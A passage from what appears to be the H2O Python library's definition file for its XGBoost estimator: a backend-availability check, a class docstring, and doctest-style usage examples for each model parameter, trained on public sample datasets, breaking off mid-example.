>>> boston_xgb = H2OXGBoostEstimator(seed=1234)
>>> boston_xgb.available()
"""
if "XGBoost" not in h2o.cluster().list_core_extensions():
print("Cannot build an XGBoost model - no backend found.")
return False
else:
return True
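# Hypothetical usage sketch (assumes a cluster is reachable via h2o.init();
# the import path matches the checkpoint example below):
# >>> import h2o
# >>> h2o.init()
# >>> from h2o.estimators import H2OXGBoostEstimator
# >>> H2OXGBoostEstimator.available()  # True only if a native backend is found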
extensions = dict(
__imports__="""import h2o""",
__class__=class_extensions,
)
doc = dict(
__class__="""
Builds an eXtreme Gradient Boosting model using the native XGBoost backend.
""",
)
examples = dict(
training_frame="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
validation_frame="""
>>> insurance = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/insurance.csv")
>>> insurance['Group'] = insurance['Group'].asfactor()
>>> insurance['Age'] = insurance['Age'].asfactor()
>>> predictors = insurance.columns[0:4]
>>> response = 'Claims'
>>> train, valid = insurance.split_frame(ratios=[.8],
... seed=1234)
>>> insurance_xgb = H2OXGBoostEstimator(seed=1234)
>>> insurance_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(insurance_xgb.mse(valid=True))
""",
nfolds="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> folds = 5
>>> titanic_xgb = H2OXGBoostEstimator(nfolds=folds,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=titanic)
>>> titanic_xgb.auc(xval=True)
""",
keep_cross_validation_models="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(keep_cross_validation_models=True,
... nfolds=5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> titanic_xgb.cross_validation_models()
""",
keep_cross_validation_predictions="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(keep_cross_validation_predictions=True,
... nfolds=5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> titanic_xgb.cross_validation_predictions()
""",
keep_cross_validation_fold_assignment="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(keep_cross_validation_fold_assignment=True,
... nfolds=5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> titanic_xgb.cross_validation_fold_assignment()
""",
score_each_iteration="""
>>> airlines = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid = airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(score_each_iteration=True,
... ntrees=55,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.scoring_history()
""",
fold_assignment="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> assignment_type = "Random"
>>> titanic_xgb = H2OXGBoostEstimator(fold_assignment=assignment_type,
... nfolds=5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=titanic)
>>> titanic_xgb.auc(xval=True)
""",
fold_column="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> fold_numbers = titanic.kfold_column(n_folds=5,
... seed=1234)
>>> fold_numbers.set_names(["fold_numbers"])
>>> titanic = titanic.cbind(fold_numbers)
>>> print(titanic['fold_numbers'])
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=titanic,
... fold_column="fold_numbers")
>>> titanic_xgb.auc(xval=True)
""",
ignore_const_cols="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> titanic["const_1"] = 6
>>> titanic["const_2"] = 7
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234,
... ignore_const_cols=True)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
weights_column="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
stopping_rounds="""
>>> airlines = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid = airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(stopping_metric="auc",
... stopping_rounds=3,
... stopping_tolerance=1e-2,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.auc(valid=True)
""",
stopping_metric="""
>>> airlines = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid = airlines.split_frame(ratios=[.8], seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(stopping_metric="auc",
... stopping_rounds=3,
... stopping_tolerance=1e-2,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.auc(valid=True)
""",
stopping_tolerance="""
>>> airlines = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid = airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(stopping_metric="auc",
... stopping_rounds=3,
... stopping_tolerance=1e-2,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.auc(valid=True)
""",
max_runtime_secs="""
>>> covtype = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/covtype/covtype.20k.data")
>>> covtype[54] = covtype[54].asfactor()
>>> predictors = covtype.columns[0:54]
>>> response = 'C55'
>>> train, valid = covtype.split_frame(ratios=[.8],
... seed=1234)
>>> cov_xgb = H2OXGBoostEstimator(max_runtime_secs=10,
... ntrees=10000,
... max_depth=10,
... seed=1234)
>>> cov_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(cov_xgb.logloss(valid=True))
""",
seed="""
>>> airlines = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid = airlines.split_frame(ratios=[.8], seed=1234)
>>> xgb_w_seed_1 = H2OXGBoostEstimator(col_sample_rate=.7,
... seed=1234)
>>> xgb_w_seed_1.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> xgb_w_seed_2 = H2OXGBoostEstimator(col_sample_rate=.7,
... seed=1234)
>>> xgb_w_seed_2.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print('auc for the 1st model built with a seed:',
... xgb_w_seed_1.auc(valid=True))
>>> print('auc for the 2nd model built with a seed:',
... xgb_w_seed_2.auc(valid=True))
""",
distribution="""
>>> cars = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/junit/cars_20mpg.csv")
>>> predictors = ["displacement","power","weight","acceleration","year"]
>>> response = "cylinders"
>>> train, valid = cars.split_frame(ratios=[.8],
... seed=1234)
>>> cars_xgb = H2OXGBoostEstimator(distribution="poisson",
... seed=1234)
>>> cars_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> cars_xgb.mse(valid=True)
""",
tweedie_power="""
>>> insurance = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/insurance.csv")
>>> predictors = insurance.columns[0:4]
>>> response = 'Claims'
>>> insurance['Group'] = insurance['Group'].asfactor()
>>> insurance['Age'] = insurance['Age'].asfactor()
>>> train, valid = insurance.split_frame(ratios=[.8],
... seed=1234)
>>> insurance_xgb = H2OXGBoostEstimator(distribution="tweedie",
... tweedie_power=1.2,
... seed=1234)
>>> insurance_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(insurance_xgb.mse(valid=True))
""",
categorical_encoding="""
>>> airlines = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid = airlines.split_frame(ratios=[.8],
... seed=1234)
>>> encoding = "one_hot_explicit"
>>> airlines_xgb = H2OXGBoostEstimator(categorical_encoding=encoding,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.auc(valid=True)
""",
quiet_mode="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8], seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234, quiet_mode=True)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.mse(valid=True)
""",
checkpoint="""
>>> cars = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/junit/cars_20mpg.csv")
>>> cars["economy_20mpg"] = cars["economy_20mpg"].asfactor()
>>> predictors = ["displacement","power","weight","year","economy_20mpg"]
>>> response = "acceleration"
>>> from h2o.estimators import H2OXGBoostEstimator
>>> cars_xgb = H2OXGBoostEstimator(seed=1234)
>>> train, valid = cars.split_frame(ratios=[.8])
>>> cars_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> cars_xgb.mse()
>>> cars_xgb_continued = H2OXGBoostEstimator(checkpoint=cars_xgb.model_id,
... ntrees=51,
... seed=1234)
>>> cars_xgb_continued.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> cars_xgb_continued.mse()
""",
export_checkpoints_dir="""
>>> import tempfile
>>> from h2o.grid.grid_search import H2OGridSearch
>>> from os import listdir
>>> airlines = h2o.import_file("http://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip", destination_frame="air.hex")
>>> predictors = ["DayofMonth", "DayOfWeek"]
>>> response = "IsDepDelayed"
>>> hyper_parameters = {'ntrees': [5,10]}
>>> search_crit = {'strategy': "RandomDiscrete",
... 'max_models': 5,
... 'seed': 1234,
... 'stopping_rounds': 3,
... 'stopping_metric': "AUTO",
... 'stopping_tolerance': 1e-2}
>>> checkpoints_dir = tempfile.mkdtemp()
>>> air_grid = H2OGridSearch(H2OXGBoostEstimator,
... hyper_params=hyper_parameters,
... search_criteria=search_crit)
>>> air_grid.train(x=predictors,
... y=response,
... training_frame=airlines,
... distribution="bernoulli",
... learn_rate=0.1,
... max_depth=3,
... export_checkpoints_dir=checkpoints_dir)
>>> len(listdir(checkpoints_dir))
""",
ntrees="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> tree_num = [20, 50, 80, 110, 140, 170, 200]
>>> label = ["20", "50", "80", "110",
... "140", "170", "200"]
>>> for key, num in enumerate(tree_num):
...     # 'num' is the ntrees value; 'key' indexes the matching label
...     titanic_xgb = H2OXGBoostEstimator(ntrees=num,
...                                       seed=1234)
...     titanic_xgb.train(x=predictors,
...                       y=response,
...                       training_frame=train,
...                       validation_frame=valid)
...     print(label[key], 'training score',
...           titanic_xgb.auc(train=True))
...     print(label[key], 'validation score',
...           titanic_xgb.auc(valid=True))
""",
max_depth="""
>>> df = h2o.import_file(path = "http://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> response = "survived"
>>> df[response] = df[response].asfactor()
>>> predictors = df.columns
>>> del predictors[1:3]
>>> train, valid, test = df.split_frame(ratios=[0.6,0.2],
... seed=1234,
... destination_frames=
... ['train.hex',
... 'valid.hex',
... 'test.hex'])
>>> xgb = H2OXGBoostEstimator()
>>> xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> perf = xgb.model_performance(valid)
>>> print(perf.auc())
""",
min_rows="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_rows=16,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
min_child_weight="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_child_weight=16,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
learn_rate="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8], seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(ntrees=10000,
... learn_rate=0.01,
... stopping_rounds=5,
... stopping_metric="AUC",
... stopping_tolerance=1e-4,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
eta="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(ntrees=10000,
...                                   eta=0.01,
... stopping_rounds=5,
... stopping_metric="AUC",
... stopping_tolerance=1e-4,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
sample_rate="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(sample_rate=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
subsample="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(subsample=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
col_sample_rate="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(col_sample_rate=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
colsample_bylevel="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(colsample_bylevel=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
col_sample_rate_per_tree="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8], seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(col_sample_rate_per_tree=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
colsample_bytree="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8], seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(colsample_bytree=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
max_abs_leafnode_pred="""
>>> covtype = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/covtype/covtype.20k.data")
>>> covtype[54] = covtype[54].asfactor()
>>> predictors = covtype.columns[0:54]
>>> response = 'C55'
>>> train, valid = covtype.split_frame(ratios=[.8],
... seed=1234)
>>> cov_xgb = H2OXGBoostEstimator(max_abs_leafnode_pred=2.0,
... seed=1234)
>>> cov_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(cov_xgb.logloss(valid=True))
""",
max_delta_step="""
>>> covtype = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/covtype/covtype.20k.data")
>>> covtype[54] = covtype[54].asfactor()
>>> predictors = covtype.columns[0:54]
>>> response = 'C55'
>>> train, valid = covtype.split_frame(ratios=[.8],
... seed=1234)
>>> cov_xgb = H2OXGBoostEstimator(max_delta_step=2.0,
... seed=1234)
>>> cov_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(cov_xgb.logloss(valid=True))
""",
monotone_constraints="""
>>> prostate_hex = h2o.import_file("http://s3.amazonaws.com/h2o-public-test-data/smalldata/prostate/prostate.csv.zip")
>>> prostate_hex["CAPSULE"] = prostate_hex["CAPSULE"].asfactor()
>>> response = "CAPSULE"
>>> seed=42
>>> monotone_constraints={"AGE":1}
>>> xgb_model = H2OXGBoostEstimator(seed=seed,
... monotone_constraints=monotone_constraints)
>>> xgb_model.train(y=response,
... ignored_columns=["ID"],
... training_frame=prostate_hex)
>>> xgb_model.scoring_history()
""",
score_tree_interval="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(score_tree_interval=5,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.scoring_history()
""",
min_split_improvement="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_split_improvement=0.55,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
gamma="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(gamma=1e-3,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
nthread="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8], seed=1234)
>>> thread = 4
>>> titanic_xgb = H2OXGBoostEstimator(nthread=thread,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=titanic)
>>> print(titanic_xgb.auc(train=True))
""",
max_bins="""
>>> covtype = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/covtype/covtype.20k.data")
>>> covtype[54] = covtype[54].asfactor()
>>> predictors = covtype.columns[0:54]
>>> response = 'C55'
>>> train, valid = covtype.split_frame(ratios=[.8],
... seed=1234)
>>> cov_xgb = H2OXGBoostEstimator(max_bins=200,
... seed=1234)
>>> cov_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(cov_xgb.logloss(valid=True))
""",
max_leaves="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
